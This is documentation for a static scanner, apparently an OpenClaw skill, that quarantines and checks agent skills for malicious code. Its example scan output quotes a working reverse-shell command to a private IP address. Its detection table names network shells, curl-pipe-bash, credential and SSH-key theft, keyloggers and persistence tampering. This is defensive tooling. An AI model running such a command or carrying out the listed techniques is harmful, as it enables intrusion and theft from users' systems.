bomb-dog-sniff v1.2.0 🐕

Like a bomb-sniffing dog for OpenClaw skills

Sniff out malicious skills before they explode in your system. Quarantine → Scan → Install only the safe ones.

What's New in v1.2.0

Security Hardening

• Fixed command injection vulnerabilities in download functions
• Added path traversal protection - Sanitizes all path inputs
• Secure quarantine - Randomized directory names with restricted permissions
• Binary file detection - Skips binary files to avoid false positives
• File size limits - Prevents DoS via huge files
• ReDoS protection - Limits regex processing on long lines

Detection Improvements

• Smart false positive reduction - Better context-aware pattern matching
• Entropy analysis - Detects encoded/encrypted payloads
• Test file awareness - Reduces severity for findings in test files
• Confidence scoring - Each finding has confidence level (high/medium/low)
• 13 detection categories - Added supply chain, prototype pollution, and malicious script detection

New Patterns

• Supply chain attack indicators (typosquatting, dynamic requires)
• Prototype pollution vulnerabilities
• Malicious npm/yarn scripts
• Browser credential theft
• SSH key theft
• Systemd persistence mechanisms

Quick Start

# Sniff out threats before installing
openclaw skill bomb-dog-sniff scan ./downloaded-skill

# Safe install from clawhub (auto-downloads, sniffs, installs if clean)
openclaw skill bomb-dog-sniff safe-install cool-skill

# Audit an already-installed skill
openclaw skill bomb-dog-sniff audit bird

# Batch scan multiple skills
openclaw skill bomb-dog-sniff batch skills-to-audit.txt

Commands

scan

Scan a skill directory for malicious patterns.

openclaw skill bomb-dog-sniff scan <path> [options]

Options:
  -j, --json          Output JSON only
  -v, --verbose       Show detailed findings
  -t, --threshold N   Set risk threshold (default: 40)
  -h, --help          Show help

Example:

openclaw skill bomb-dog-sniff scan ./untrusted-skill
openclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json

Output:

🔍 Bomb-Dog-Sniff Security Scanner v1.2.0
Target: /home/user/skills/untrusted-skill

🔴 CRITICAL (2)
──────────────────────────────────────────────────
  crypto_harvester: scripts/wallet.js:23
    Crypto wallet private key harvesting detected
    Code: const privateKey = "a1b2c3..."
    Confidence: high

  reverse_shell: scripts/backdoor.sh:5
    Reverse shell or remote code execution detected
    Code: bash -i >& /dev/tcp/192.168.1.100/4444
    Confidence: high

🟠 HIGH (1)
──────────────────────────────────────────────────
  pipe_bash: install.sh:12
    Dangerous curl | bash pattern detected
    Confidence: high

═══════════════════════════════════════════════════
SCAN SUMMARY
═══════════════════════════════════════════════════
☠️ Risk Score: 75/100
   Risk Level: MALICIOUS
   Duration: 125ms
   Files Scanned: 12/15
   Files Skipped: 3 (binary/empty/large)
   Findings: 3

   Severity Breakdown:
     🔴 CRITICAL: 2
     🟠 HIGH: 1

📋 Recommendation:
   MALICIOUS - Do not install. Found 3 critical security issues.

Scan ID: bds-20260208-a1b2c3d4

safe-install

Download from clawhub/GitHub, scan, and install only if safe.

openclaw skill bomb-dog-sniff safe-install <source> [options]

Source:
  - ClawHub skill name: bird
  - GitHub URL: https://github.com/user/skill
  - Local path: ./local-skill

Options:
  --threshold N   Set risk threshold (default: 39)
  --dry-run       Scan only, don't install
  --verbose       Show all findings

Example:

# Install with default threshold (39)
openclaw skill bomb-dog-sniff safe-install bird

# Stricter threshold
openclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20

# Scan only (dry run)
openclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run

# GitHub source
openclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill

audit

Audit an already-installed skill.

openclaw skill bomb-dog-sniff audit <skill-name> [options]

Example:

openclaw skill bomb-dog-sniff audit notion

batch

Scan multiple skills from a list file.

openclaw skill bomb-dog-sniff batch <list-file>

Example list file (skills.txt):

# My installed skills to audit
bird
notion
gog
slack
./custom-skill

# Commented lines are ignored
# old-skill

Run:

openclaw skill bomb-dog-sniff batch skills.txt

Detection Categories

bomb-dog-sniff scans for these threat categories:

Category	Severity	Examples Detected
crypto_harvester	CRITICAL	Private key extraction, wallet exports, mnemonic theft
credential_theft	CRITICAL	Environment variable exfiltration, config file theft, SSH key theft
reverse_shell	CRITICAL	Netcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote code
keylogger	CRITICAL	Keyboard capture with exfiltration, clipboard theft, password field monitoring
encoded_payload	HIGH	Base64 execution chains, hex escapes with eval context, obfuscated code
suspicious_api	HIGH	Pastebin/ngrok/webhook destinations, dynamic URL construction with secrets
pipe_bash	HIGH	curl | bash, wget | sh patterns
deposit_scam	HIGH	"Send ETH to 0x...", payment prompts in unexpected contexts
supply_chain	HIGH	Typosquatting, dynamic requires, suspicious postinstall scripts
prototype_pollution	HIGH	Dangerous object merging, __proto__ manipulation
malicious_script	CRITICAL	Pre/postinstall doing network/exec operations, modifying other packages
network_exfil	MEDIUM	File reading followed by network transmission
file_tamper	CRITICAL	.bashrc modification, crontab editing, SSH authorized_keys manipulation

Risk Scoring

0-19   SAFE        ✅ Install freely
20-39  LOW         ⚠️  Review recommended
40-69  SUSPICIOUS  🚫 Blocked by default
70-100 MALICIOUS   ☠️  Never install

Each finding adds to the score:

• CRITICAL: +25 points (× confidence multiplier)
• HIGH: +15 points (× confidence multiplier)
• MEDIUM: +5 points (× confidence multiplier)

Confidence multipliers:

• High confidence: 1.0×
• Medium confidence: 0.75×
• Low confidence: 0.5×

Score caps at 100.

How It Works

Safe Install Process

1. QUARANTINE
   └── Skill downloaded to /tmp/bds-q-<random>/
   └── Randomized, non-predictable directory name
   └── Restricted permissions (0o700)
   
2. SCAN
   ├── Check all files against detection patterns
   ├── Skip binary files, empty files, files >10MB
   ├── Calculate entropy for encoded payload detection
   ├── Apply confidence multipliers
   └── Generate findings report
   
3. DECISION
   ├── Risk > threshold? → BLOCK & DELETE
   └── Risk ≤ threshold? → PROCEED
   
4. INSTALL (if passed)
   └── Move from quarantine to skills directory
   └── Backup existing installation (max 5 backups)
   
5. CLEANUP
   └── Securely remove quarantine directory

Scanning Details

• Static analysis only - No code execution
• Multi-pattern matching - 60+ detection patterns
• Line-level reporting - Exact file:line for each finding
• False positive reduction - Context-aware pattern matching
• Binary detection - Automatically skips binary files
• Symlink loop protection - Tracks visited inodes
• Depth limiting - Max 20 directory levels
• Test file handling - Reduces severity for test files

Configuration

Environment Variables

# Set custom skills directory
export OPENCLAW_SKILLS_DIR=/path/to/skills

# Set default risk threshold
export BOMB_DOG_THRESHOLD=25

Per-Skill Configuration

Add to your skill's package.json:

{
  "bomb-dog-sniff": {
    "riskThreshold": 25,
    "excludedCategories": ["network_exfil"]
  }
}

CI/CD Integration

Add to your CI pipeline:

# .github/workflows/skill-security.yml
name: Skill Security Scan

on: [push, pull_request]

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      
      - name: Scan skills
        run: |
          for skill in skills/*/; do
            echo "Scanning $skill"
            node skills/bomb-dog-sniff/scan.js "$skill" || exit 1
          done

Exit codes:

• 0 - Safe (score below threshold)
• 1 - Error/invalid arguments
• 2 - Risky (score ≥ threshold)

Programmatic API

const { scanSkill } = require('./scan');
const { safeDownload } = require('./safe-download');

// Scan a skill
const report = scanSkill('./path/to/skill', { verbose: true });
console.log(`Risk score: ${report.riskScore}`);
console.log(`Findings: ${report.findings.length}`);

// Safe download and install
const result = await safeDownload('cool-skill', {
  autoInstall: true,
  riskThreshold: 30,
});

if (!result.success) {
  console.error('Installation blocked:', result.reason);
}

Security Limits

To prevent DoS and ensure scanner security:

Limit	Value	Purpose
Max file size	10MB	Prevent memory exhaustion
Max line length	10KB	Prevent ReDoS attacks
Max files per scan	10,000	Prevent resource exhaustion
Max findings per file	100	Prevent output flooding
Max total findings	500	Prevent result flooding
Max directory depth	20	Prevent infinite recursion
Download timeout	2 minutes	Prevent hanging downloads
Max download size	50MB	Prevent disk exhaustion

False Positives

If legitimate code triggers a warning:

1. Check confidence level - Low confidence findings are more likely to be false positives
2. Review the excerpt - Look at the actual code flagged
3. Test files are noted - Findings in *.test.js or __tests__/ have reduced severity
4. Comments are generally skipped - Unless they contain suspicious keywords

To report false positives, please include:

• The file content that triggered the false positive
• The pattern category that matched
• Expected behavior

Best Practices

1. Always scan before installing unknown skills
2. Use --dry-run first for untrusted sources
3. Set lower threshold (--threshold 20) for critical systems
4. Audit regularly - Rescan installed skills periodically
5. Review CRITICAL findings - Never ignore critical severity warnings
6. Check confidence levels - High confidence = higher priority

Files

• SKILL.md - This documentation
• scan.js - Core scanner engine
• patterns.js - Detection pattern definitions
• safe-download.js - Safe download & install logic
• scripts/sniff.sh - CLI wrapper
• package.json - Package configuration
• QUICKSTART.md - Quick reference guide

Security Notes

⚠️ Limitations:

• Static analysis only (some obfuscation may evade detection)
• Pattern-based (novel attacks may not be detected)
• Not a replacement for manual code review on critical systems
• Cannot detect runtime-only malicious behavior

✅ Recommendations:

• Use bomb-dog-sniff as first line of defense
• Review code manually for high-security environments
• Keep patterns.js updated with new threat signatures
• Report false positives and missed detections
• Combine with other security tools for defense in depth

Changelog

v1.2.0 (Hardened Edition)

• SECURITY: Fixed command injection vulnerabilities in safe-download.js
• SECURITY: Added path traversal protection
• SECURITY: Secure randomized quarantine directories
• FEATURE: Binary file detection and skipping
• FEATURE: File size limits (10MB per file, 50MB download)
• FEATURE: Entropy analysis for encoded payload detection
• FEATURE: Confidence scoring for all findings
• FEATURE: Test file awareness with severity reduction
• FEATURE: 3 new detection categories (supply_chain, prototype_pollution, malicious_script)
• IMPROVEMENT: Better false positive reduction with context-aware matching
• IMPROVEMENT: ReDoS protection via line length limits
• IMPROVEMENT: Symlink loop protection
• IMPROVEMENT: Backup rotation (max 5 backups)

v1.1.0

• Added safe-install command with quarantine workflow
• Added audit command for installed skills
• Added batch command for multiple skill scanning
• Enhanced detection patterns (50+ signatures)
• Added risk threshold configuration

v1.0.0

• Initial release with basic scanning
• 10 detection categories
• JSON output format

License

MIT - See LICENSE file

---

Stay safe. Scan everything. Trust verified skills only. 🦞🐕